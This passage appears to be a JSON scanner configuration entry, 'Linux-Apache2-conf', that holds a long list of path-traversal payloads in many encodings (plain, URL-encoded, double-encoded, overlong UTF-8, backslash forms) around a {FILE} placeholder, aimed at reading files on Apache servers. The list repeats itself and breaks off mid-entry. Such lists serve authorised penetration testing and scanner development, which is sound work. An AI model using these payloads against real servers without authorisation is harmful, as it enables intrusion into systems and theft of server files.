-[{"Name":"Linux-Apache2-conf","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","..%c0%af{FILE}","..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","..%c1%9c{FILE}","..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","..%%32%66{FILE}","..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","..%%35%63{FILE}","..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\